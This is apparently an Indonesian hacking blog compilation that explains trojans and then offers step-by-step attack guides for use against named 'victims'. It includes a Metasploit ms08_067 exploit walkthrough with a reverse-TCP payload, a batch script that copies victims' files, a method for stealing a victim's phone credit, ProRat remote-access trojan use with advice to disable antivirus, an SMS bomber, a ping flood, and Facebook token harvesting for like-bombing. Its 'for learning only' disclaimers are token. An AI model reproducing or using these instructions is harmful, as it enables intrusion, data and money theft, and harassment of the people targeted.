Trojan horse

     Postingan kali ini Cybervirburg32 akan menjelaskan tentang sejarah, jenis-jenis dan cara kerja  Trojan horse gitu deh... Ok Saatnya serius menulis.. Penggunaan Trojan Horse tidaklah semata-mata digunakan untuk iseng seperti yang dilakukan oleh virus, oia virus dengan trojan berbeda loh, kerap kali orang awam mengatakan trojan adalah sebuah virus, kalau saya boleh berpendapat trojan adalah sebuah malware bukan virus.
Biasanya trojan digunkan untuk tujuan tertentu, misalnya untuk pencurian data atau memata-matai seseorang. Sebagai contoh, kita menyisipkan trojan pada sebuah email lalu kita kirim kepada rekan kita dan jika rekan kita membuka email tersebut maka trojan dapat tereksekusi dan akan menjalankan tugas yaitu mencuri data dari rekan kita..

Ko, namanya trojan horse?
Kata trojan horse bermula dari perang Troya. Pada jaman dahulu terdapat sebuah kota yang bernama Troy yang tak terkalahkan, meskipun hanya satu kota kecil pasukan Yunani yang memiliki pasukan lebih banyak tidak dapat mengalahkannya. Ide licik pun muncul di otak orang Yunani yang membuat sebuah patung kuda dari kayu yang ukurannya sangat besar, untuk menyimpan pasukan Yunani . Lanjut cerita pasukan Yunanni berpura-pura mengikhlaskan kekalahannya dan memberikan sebuah hadiah patung kuda dari kayu tersebut. Tanpa pikir panjang bangsa Troy menerima hadiah tersebut dengan senang hati, namun ketika di malam hari pasukan Yunani yang berada di dalam patung kuda yang sangat besar itu keluar, dan menyerang pasukan Troy yang sedang tidur lelap hingga membumi hanguskan kota Troy.

Untuk Apa Trojan?
Sebuah trojan dapat membuka pintu belakang dari sebuah sitem komputer sehinnga sang hacker dapat dengan leluasa masuk dan munguasai komputer trojan,

Apa Saja yang Dapat Dilakukan Trojan?
Banyak sekali yang dapat dilakukan dengan malware ini, contohya:

• Mematikan komputer korban
• Mengirim pesan
• Melihat apa yang di kerjakan
• Merekam semua ketikan keyboard agar sang hacker mendapatkan password
• Pencuiran dokumen korban
• dan beratus-ratus kegiatan illegal lainnya,

dan semua kegiatan illegal itu dapat dilakukan jarak jauh, di dalam sebuah jaringan wirelless (hotspot) atau internet.

Bagaimana Cara Trojan Menyebar?

•  Seorang hacker dapat mengirimkan sebuah trojannya kepada korban melalui email

• Seorang hacker akan melakukan berbagai cara untuk memasukan program jahat ini kedalam komputer korban. contohnya: Social Enginnering atau teknik penipuan, nah sekarang kita tanya pada diri sendiri. Apakah kita pernah atau sering mendownload software bajakan + cracknya? Nah, inilah kesempatan seorang hacker untuk menyisipkan trojannya pada sebuah software (sering disebut binder "kalau gak salah"). Dan yang lebih parahnya lagi seorang hacker biasanya mendecprypt trojannya agar tidak terdetect oleh sebuah anti virus..

Namun tidak semua software bajakan itu disispkan sebuah trojan, ada sekumpulan pembajak yang terkenal di dunia underground (sarang hacker), mereka menjamin software-software bajakan mereka aman dari malware/trojan dan segala kegiatan yang merugikan pengguna..

Proses Hacking

Menurut Buku hacking exposed pada http://www.hackingexposed.com/, karangnan Stuard McClure, Joel Scambrayndan George Kurtz, proses hacking dibagi menhadi beberapa bagian:

• Footprinting

Proses mencari informasi tentang korban/target yang sebanyak-banyaknya. Dilakukan dengan mencari data-data melauli internet, surat kabar dan lailn-lain. 

• Scanning

Proses lanjutan dengan menganalisa servis yang dijalankan server dan router di internet, biasanya dilakukan dengan ping, nmap, dan lain-lain

• Enumeration

Proses lanjutan dengan mencoba ke mesin target .

• Gainning Accses

Percobaan pengambil alihan ke target berdasarkan informasi yang didapatkan sebelumnya

• Escalating Privilage

Meningkatkan hak akses jika telah berhasil untuk msuk kedalam sistem pada server/router

• Covering Attack

Proses menghapus jejak segala macam log pada server/router agar tidak bisa dilacak

• Creating Back doors

Menciptakan sebuah jalan rahasia dari sebuah sistem router/server agar bisa memasuki sistem kembali

• Denial of Service

Segala upaya yang dilakukan oleh seorang cracker untuk menguasai sistem sudah dilakukan tetapi gagal. Maka Cracker mengambil langkah terakhir yaitu Denial of Service yang merupakan wujud keputusannya. Denial of Service lebih dikenal dengan Dos/DDos ya ng menyebabkan server/router restart, bahkan rusak (crash)

Hacking Add-on firefox

   Cybervirburg32 akan menjelelaskan add-on firefox untuk memudahkan kegiatan hacking.
Sekarang cybervirburg32 akan membuat Mozila Firefox  menjadi Senjata Hacker...
Dan saya mengajak teman-teman untuk bersama-sama memodifikasi Mozila Firefox ini agar menjadi sejata yang lebih mematikan lagi... (Add-On dan Program Sendiri)
Disini cybervirburg32 akan menampilkan apa yang saya peroleh dengan addon yang sudah saya includekan.
Meski terasa loading pertama berat namun ketika muncul keren abizz....
Silahkan download add-on plus no malware

https://addons.mozilla.org/en-US/firefox
1. Free Ebook Search : untuk mencari e-book
2. Server Spy : melihat jenis server
3. Domain Finder : mencari data suatu domain
4. Who is : melihat detail situs
5. About This Site : melihat detail situs
6. Tix Now : mematikan timer rapidshare
7. Firebug : mengedit html, css, javascript di virtual hacking
8. XSS-Me : percobaan xss ke situs target
9. SQL Inject Me : percobaan SQL Injection ke situs target
10.Unhide Passwords : melihat password saat kita sniffing di LAN sendiri
11. Tab URL Copier : untuk mencopy paste URL
12. Who Are You? : Mencari data nama seseorang di internet
13. Zoom Fox : memperbesar gambar di web
14. Linkification : melihat http link target
15. XRays : melihat source code dengan tampilannya
16. Amazing Media Browser : mendownload file flash dengan cara hacking
17. Down Them All : mengambil banyak file html diserver target
18. Download Helper : mendownload video hacking
19. Spamborg : untuk pendaftaran email tanpa iklan
20. FasterFox : untuk mempercepat firefox
21. Stylish : menghack stylish di wordpress.com
22. Aardvark : mendelete barner saat melihat source code situs
23. Flashblock : memblock file flash
24. Flash Killer : tidak menampilkan flash agar yang terlihat tulisan saja
25. HostIP.Info.Geolocation : sorot link dan sudah terlihat alamat situs
26. Live HTTP Header : menampilkan http header
27. Fire FTP : sebagai FTP untuk upload file ke situs target
28. View Cookies : untuk melihat cookies
29. Add N Edit Cookies : untuk mengedit cookies
30. IeView : untuk melihat gambar di internet explore
31. Anonymouser : membuat diri tidak terlihat
32. User Agent Switcher : menyamar menjadi browser laen
33. YmNotifier : menyadap password yahoo
34. GMail Notifier : menyadap password gmail
35. Switch Proxy : mengganti proxy biar aman saat hacking
36. Reload Every : dapat digunakan untuk boom email target
37. Adblock Plus : untuk mengakses email dengan 3 profile
38. Hackbar : untuk mengetikkan URL yang sangat panjang
39. Calling ID Advisor : Bedah situs
40. Bandwidth Meter : untuk mengukur bandwidth kita
41. Advanced Dork: untuk pencarian google secara cepat dengan advance operator
42. Cipherfox : memperlihatkan ssl / tls chipper dan key di status bar..
43. Java Console: Untuk menggunakan console via java
44. Copycode: mengijinkan kita untuk memilih text dan mengcopynya secara html
45. Fire Encrypter: memberikan enkripsi / decripsi dan hashing waktu kita hacking
46. FirePHP: mengijinkan untuk masuk firebug console menggunakan simple PHP call..
47. Inline Code Finder For FireBug: Untuk mencari bug menggunakan firebug
48. Page Hacker: menambahkan tombol hack pada halaman yang terpilih
49. Password Hasher: untuk memperlihatkan password
50.Tinyurl Creator: untuk membuat url yang akan kita hack menjadi short
51.SQL Injection : untuk mengetest ketahanan suatu situs terhadap SQL Injection

Nah itulah add-on yang dibutukan untuk kegiatan hacking. untuk tutorialnya bisa anda download disini

Remote mengunakan Metasploit

   

Pada Tutorial hacking kali ini Cybervirburg32 akan jelaskan cara Remote PC dengan Metasploit.Software ini hanya bisa digunakan untuk mengendalikan komputer orang lewat jaringan wireless saja. 

persiapan yg di perlukan antara lain:

1.Metasploit versi berapa aj, karena sekarang udah versi 3.3.4 maka kita akan
memakai versi baru tersebut tool ini bisa di download di sini

2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan

karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren ),,tp gw pk windows aj..hehe..
3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya
4.Ip dari komputer korban (disini gw cb exploit 192.168.1.31)
5.siapin aj apa yg perlu mnurut bro perlu biat gak bosen nunggu,,

pertama install metasploitnya, klo di windows tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya

./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)

klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).

pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc di 1 jaringan,mo pk cain n avbel or netcut jg bisa,,klo gw sih sering make
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya

( simulation on micr*soft windows)
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 484 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r8002 updated today (2009.12.28)

msf >



kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap

nmap -v -O -p445 192.168.1.31

command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya

ketikan di jendela msf(metasploit)

show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan

karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah

dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show payloads

TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager


ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload

windows/vncinject/reverse_tcp

setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp

setelah itu kita set ip dari target

set RHOST 192.168.1.31 -----> komputer korban

set LHOST 192.168.1.37 -----> komputer kita

klo udah selesai kita tinggal launch exploit di msf

tinggal ketik

exploit

Semoga berhasil......

Tools SMS Bomber Pro

    Kali ini Cybervirburg32 mau share tools Beaver SMS Bomber Pro..
fungsinya sihhh buat ngeboom ponsel lewat SMS..
nie screenshotnya...

SMS Bomber Pro

        Program ini akan mengebom ponsel korban dengan SMS. Mendukung semua jaringan besar di seluruh dunia. Tetapi jika jaringan Anda tidak ada dalam daftar, maka jangan khawatir, Anda juga dapat menambahkan jaringan operator dengan bantuan "kebiasaan" pilihan. Anda juga dapat memuat daftar beberapa korban dan bom mereka secara bersamaan. Perbaikan yang Beaver telah dibuat dalam versi ini lebih Bomber SMS sebelumnya adalah bahwa Anda dapat spoof alamat email dari mana Anda pemboman ponsel korban. Misalnya, jika ada kesalahan pengiriman pesan, ia akan menanyakan apakah Anda ingin mengubah E-mail/Password Anda gunakan. Semua kredit ke Beaver untuk program ini bagus.
Gunakan sebaik mungkin br0..
 

Download di SINI

Software pencari serial number otomatis

       Software pencari serial number otomatis ini bernama serial hunter, untuk menggunakannya pun sangat ringan dan mudah.selain ringan,software ini bersifat portable (ngga usah install/tinggal klik langsung bekerja).so,ngga memakan memory hardisk hanya 132KB.
Download di sini

Kamu bisa mencari bermacam-macam serial number software dijagad maya.caranya masukkan nama software, kemudian klik enter. secara otomatis software ini akan mengerjakan tugas sebagaimana mestinya.sebagai contoh saja : Adobe Photosop CS 5,maka akan muncul beberapa serial number.seperti gambar di bawah ini.

    Namun sayangnya,terkadang koneksi antara serial hunter ke internet terkadang mengalami failed.jadi ngga semua serial number bisa ditemukan 100%.tapi apa salahnya jika kamu mencobanya.

Hack Pulsa Teman

Cara Nge Hack / Membajak / Mencuri Pulsa Teman Kita Tanpa Sepengetahuannya …..

        Yang Harus Di Ingat , Postingan ini Bukan Berarti Untuk Mengajarkan Kalian Yang Tidak Benar , Akan Tetapi Postingan ini Hanya Diperuntukan Untuk Pengetahuan Dan Tentunya Untuk Pembelajaran Semata. Postingan ini diambil dari forum hackcenter ….

 

Kalian Ikuti Cara Di Bawah ini :

1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,

 

2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),

 

3. lalu submit, setelah itu kamu login dan pilih remind me later,

 

4. lalu kamu plih invite friend no tujuan kamu isi “TP(spasi)no.kamu(spasi)jumlah pulsa”( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,

( Yang Mesti Di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu Di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi )

 

Contoh 1 :

Sebut Aja Kamu Dengan Nama Si ” A ” ( Si Pelaku Pencurian )

Dan Sebut Aja Si Korban Yang Ingin Kamu Curi Pulsa’a , Si ” B “

SI “A” —- > TP 08565555555 50000

Keterangan : Brati Si A Mencuri Pulsa Dari No Hp 08565555555 Sebanyak Rp.50.000

Si “B” —– > Sementara Si ” B ” Pulsa’a Hanya Rp. 20.000

Apabila Kaya Seperti Di Atas , Kemungkinan Akan Terjadi Erorr ,Karena Pulsa Si ” B ” Hanya Rp.20.000 Sedangkan Si ” A ” Mencuri Rp.50.000 Dari Si “B” Yang Terjadi Adalah Pulsa Si B Tidak Mencukupi Target Yang Di Minta Oleh Si “A” , Maka Terjadilah Erorr …. Tapiiii … Apabila DewiFortuna Di Pihak Anda Maka Cara Seperti ini pun Berhasil …. Maka Pulsa SI “B” Yang Rp.20.000 Tidak Tersisa Sepeserpun Untuk Si “B”.

Nah … Untuk Melakukan Yang Benar Dan Tidak Terjadi Erorr,,,, Gw Punya Tips …

 

Ikuti Tips Di Bawah Ini :

1. Lo Mesti Tau Betul Orang Yang Ingin Lo Curi Pulsa’a ( Untuk Percobaan ) Lo Curi Pulsa Ade Lo Atau Kaka Lo Sndri

2. Lo Mesti Pulsa Dari Ade Atau Kaka Lo Yang Ingin Di Curi

3. Ini Di Karena Agar Lo Tau Betul Dan Yang Diperlukan Dalam Teknik Ini adalah Mengira-Ngira Isi Pulsa Si “B”. Jangan Sampai Melebihi Dari Target Yang Lo Minta Ke Si “B”

Misalkan : Misal Si B Mempunyai Pulsa Rp. 30.000 , Maka Yang Harus Lo Lakuin Adalah , Jangan Melebihi Pada Saat Mencuri Pulsa Si B , Cara Seperti ini Kemungkinan 99,9% Sukses , Di Bandingkan Cara Sebelumnya ,

Contoh Yang Benar :

TP 085555555 29500 ( Maka Yang Akan Terjadi Adalah Pulsa Si “B” Hanya Kamu Sisain Rp.500 Perakkkk ….. )

 

Keterangan :

TP —– > Perintah Tranfer Pulsa Untuk Operator M3 , Untuk kartu lain sesuaikan kode transfernya.

085555555 —– > Nomer Hp Si Korban Yang Ingin Kamu Curi

29500 ——– > Jumlah Pulsa Yang Ingin Kamu Curi

Semoga bermanfaat..
ingat jgan di salah gunakan br0... :D

Membuat Status FB Kosong

Copy kode berikut lalu pastekan kode ini di tempat kamu membuat status :

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

@[1:1:　　]

Mudah bukan hehehe......... 

Cara Hack Wifi dengan CMD

     Selamat malam teman semua kali ini Cybervirburg32 akan membagikan tutorial cara hack wifi dengan CMD. Selain dapat hack wifi dengan cara yang susah, kita juga dapat hack wifi dengan menggunakan CMD (Command Prompt). Nah kita langsung aja ke langka yang sangat ditunggu-tunggu. 

Ikuti perintah berikut tanpa ada kesalahan sedikit pun :

1. Buka RUN lalu ketikkan cmd.exe, atau bisa juga dengan klik start lalu accessories dan pilih CMD (Command Prompt).

 

• Maka akan muncul tampilan gambar seperti dibawah ini. 

 

• Lalu Ketikan ipconfig/all.

 

• Maka hasilnya akan seperti dibawah ini. yang perlu diingat adalah DNS Server catat'lah bila perlu melalui notepad atau wordpad.

 

• Lalu scrolling cmd.exe kalian kebagian yang paling bawah. Lalu Ketikkan perintah lagi seperti berikut ping -L 500 10.0.1.2 -t. dan kode 10.0.1.2 itu di dapat dari DNS Servers punya saya di ubah DNS Serversnya dengan milik kalian yang telah sobat catat tadi. 

 

• Lalu akan terlihat tampilan seperti dibawah ini. Jangan lupa jangan di close di minimize aja sambil menikmati internetan gratis.

 

NB : Jika kalian belum puas dengan kecepatan wifi yang kalian hack ganti angka 500 dengan 1000 atau 2000 juga boleh

Good Luck..

Auto Bomb Like Fans Page Facebook

       Saya pernah mengalami kesusahan dalam mencari Bomb Like ini tapi saya terus berusaha agar Fans Page saya di like banyak orang. Nah Kamu pasti penasaran bukan gimana caranya, pasti saya bagikan dong heheheheheheh......... :p. Ga usah panjang lebar kita langsung saja ke TKP.

1. Kunjungi Link ini new.idrevolution.net.
2. Klik tulisan "Click Here To Continue".
3. Get Token contoh tokennya bisa di lihat dibawah ini

https://www.facebook.com/connect/login_success.html#access_token=AAABempp6Ls0BAGFNRfCPuWQAxHpyw5aQr7plACaZBJRhgsRSPyX8oL3hZBjqsGvsHdAWrKfVxlz0KGvRoO55Bx5HZC94BLbkDdm6JHA8AZDZD&expires_in=0

Yang bercetak tebal dan berwarna merah itu adalah tokennya.
4. setelah dapatkan tokennya lalu klik tulisan "Confirm".
5. Klik Tulisan "Use Auto Like" > "Bomb Like". Di kotak Bomb Like kamu masukan ID Fans Page
    kamu bisa dilihat di link www.aing-tools-3.blogspot.com.
6. Tunggu hingga prosesnya selesai.

Program Pencuri Data Dengan Notepad

      Cara Membuat Program Pencuri Data Dengan Notepad program ini berfungsi untuk mencuri data seperti:

*.3gp
*.jpg
*.avi
*.wmv
*.rm
*.mpg
*.doc
*.xlsx

   Dan lainnya sudah tersedia dalam script berikut, caranya mudah banget :
1. Buka Notepad kalian melalui accessories atau melalui Run ketikan notepad.
2. Setelah kebuka notepadnya copy paste script berikut :
Sciptnya

echo off
color 0a
mode 31,15
if "%1"=="/?" goto Sej
if not "%n%" == "" set n=
:MetDtg
cls
title Stole V 3.2
msg * Digunakan untuk mencuri
msg * File atau data2 korban
echo.
echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo ³ Program Aplikasi ³
echo ³ DY24 Brg ³
echo ³ Author : Cybervirburg32 ³
echo ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
:awal
option

echo ------EKSTENSI FILE----------

echo [1] 3gp [4] jpg [7] doc

echo [2] wmv [5] rm [8] xls

echo [3] avi [6] mpg [9] Exit

echo [10] exe

echo =============================

echo.

set/p "pil=Masukan Pilihan'a Bro: "

if %pil%=='' goto option

if %pil%==1 goto 3gp

if %pil%==2 goto wmv

if %pil%==3 goto avi

if %pil%==4 goto jpg

if %pil%==5 goto rm

if %pil%==6 goto mpg

if %pil%==7 goto

if %pil%==8 goto m

if %pil%==9 goto keluar

if %pil%==10 goto exe

goto option
:3gp
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.3gp') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo File is ok Bro
pause >nul
cls
goto awal

goto option
:goto wmv
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.wmv') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)

cls
echo File is ok Bro
pause >nul


goto option
:avi
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.avi') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo File is ok Bro 
pause >nul
cls

goto option
:jpg
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.jpg') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo File is ok Bro
pause >nul
cls

goto option
:rm
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.rm') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo File is ok Bro
pause >nulcls

goto option
:mpg
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.mpg') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo File is ok Bro
pause >nul
cls

goto option
:doc
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.doc') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo
File is ok Bro
pause >nul
cls

goto option
:xls
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.xls') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo File is ok Bro 
pause >nul
cls

goto option
:exe
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.exe') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo File is ok Bro
cls


:keluar
msg * Pencurian Selesai Bro!!!
msg * Selanjutnya terserah Ente mau di apa'in tu barbut???
msg * HEhehehehe
msg * by - Cybervirburg32

3. Kalau Sudah save filenya dengan ekstensi *bat dan Save As Type nya isi dengan All File
    contoh : Pencuri.bat 

Hacking Speed IDM

      Gan , tadi ane searching2 di Forum sebelah , ternyata ada trit "Cara setting IDM biar Bikin ngacir-cir". nah buat kalian agan2 yang menggunakan download manager IDM, kadang belum benar-benar merasakan manfaat dari SW tsb, karena belum disetting dengan benar. Jika sudah diseting, IDM akan berfungsi optimal, meskipun kita gonta-ganti tipe koneksi (wive-LAN, WIFI, Dial-up, dll).
Nah bagemana caranya biar agan2 bisa merasakan manfaat ilmu yang ane dapet hingga bikin downloadan nte yang biasanya sejam berubah jadi 15 menit , jadi bisa hemat waktu gan. Pertannyaanya, Bagaiamana caranya Membuat IDM Download 3x Lebih Cepat alias Ngaciiir ?
Gini caranya:

1. klik IDM di try icon
2. klik Option
3. Pada Connection/ Speed, pilih Other, dan pada Default Max conn.number pilih 16
4. Tutup IDM
5. Klik Start kemudian un dan tuliskan "regedit" tanpa petik , kemudian klik ok , Jalankan Regedit>HKey_Current_User>Software>Download Manager> (lihat jendela kanan) Connection Speed>double click>pilih decimal> isi dengan 9999999999999>OK
6. tutup regedit (close )
7. Coba ntuk DL....;-)
Catatan:
Kecepatan Download dipengaruhi juga oleh kondisi jaringan yg ada.. 

Hacking Dengan Tools ProRat V1.9 Buatan Turki

• TOOL HACKER 

   

  

       Tools buatan orang turki ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah, tinggal kita mengetahui IP dan Port komputer Komputer lain saja, maka kita dapat langsung bisa mengetahui informasi dari PC, mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD-ROM atau bahkan memotret wajah si pemilik komputer yang telah di Hack .. tapi ingat ini bukan untuk menjahili... ini hanya untuk pembelajaran saja.

• CARA Menggunakan ProRat

     Pertama kali kita harus mengetahui terlebih dahulu IP dan Port korban yang terbuka. Kita dapat melakukannya dengan cara manual atau juga dengan bantuan tool Ports Scanner...

      Langkah selanjutnya yaitu kita jalankan ProRat,
tools ini dapat kamu download Disini. Password : Pro

      Sebelumnya matiin dulu Anti Virus kamu (disable), karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi komputer kita. Setelah itu isikan IP korban pada form IP dan Portnya (default 5110). Apabila kita klik tombol Connect maka koneksi ke komputer korban belum bisa, karena komputer korban belum kita infeksi. Untuk menginfeksi komputer korban kita terlebih dahulu membuat server yang akan dijalankan pada komputer korban.

Kita tinggal menjalankan Server tersebut dikomputer korban.

Setelah Server tersebut berhasil berjalan pada komputer korban, maka kita langsung mencoba mengkoneksikannya dengan komputer kita.

Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on.

       Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected.

Selamat mencoba dan semoga di pergunakan untuk hal yang baik2 aja… ok Bro.

Perintah-perintah commandprompt untuk jaringan

        Postingan saya kali ini memperlihatkan beberapa perintah yang bisa anda gunakan pada command prompt. perintah-perintah command prompt di bawah ini berkenaan dengan perintah yang berfungsi untuk jaringan. jadi perintah yang tidak berkenaan dengan jaringan tidak saya tampilkan. ok, beberapa perintah tersebut adalah sebagai berikut :

1. ipconfig /all
Menampilkan informasi konfigurasi koneksi, misalnya Host Name, Primary DNS Type, Ethernet Adapter LAN, MAC address.

2. ipconfig /flushdns
Menghapus DNS Cache

3. ipconfig /release
“Menghapus” semua koneksi IP Address.

4. ipconfig /renew
Membuat IP Address baru untuk adapter tertentu.

5. ipconfig /displaydns
Menampilkan DNS Cache.

6. ipconfig /registerdns
Melakukan refresh DNS dan meregister kembali koneksi DNS.

7. ipconfig /showclassid
Menampilkan informasi DHCP Class.

8. ipconfig /setclassid
Mengubah DHCP Class ID

9. control netconnections
Menampilkan Network Connection.

10. nslookup
Mengetahui alamat ip address dari nama domain yang di tuliskan

11. netstat
Menampilkan informasi koneksi TCP/IP yang sedang aktif.

12. route
Menampilkan local route.

13. hostname
Menampilkan nama komputer.

14. ping
Contoh: ping cybervirburg32.blogspot.com
Melakukan test koneksi ke situs cybervirburg32.blogspot.com

Semakin sedikit % loss-nya maka semakin baik koneksinya.

15. tracert
Menampilkan informasi IP Address route.
contoh: tracert cybervirburg32.blogspot.com 

16.net view
menampilkan user yang sedang login

17.Net User
menampilkan semua login pada host

18.shutdown -i / -m \\computer name ( sebagian perintah bisa juga digunakan untuk komputer standalone )
mematikan/restart komputer dalam jaringan secara remote, ada berbagai parameter pada perintah ini.
*parameter -a untuk abort shutdown
*parameter -s untuk shutdown komputer
*parameter -c untuk menulis pesan saat proses shutdown
*parameter -r untuk restart
*parameter -l untuk logoff
*parameter -t untuk menentukan interval waktu dilakukannya shutdown
*dll
contoh:
shutdown -s -t 60 -c "sorry you are disconected"
mematikan komputer dalam hitungan mundur selama 60 detik dengan menampilkan pesan "maaf koneksi anda diputus"

19.arp -a untuk menampilkan arp komputer anda, dan parameter arp -s "ip adrress" "MAC adrress" untuk merubah/membuat arp anda dari dynamic menjadi static.


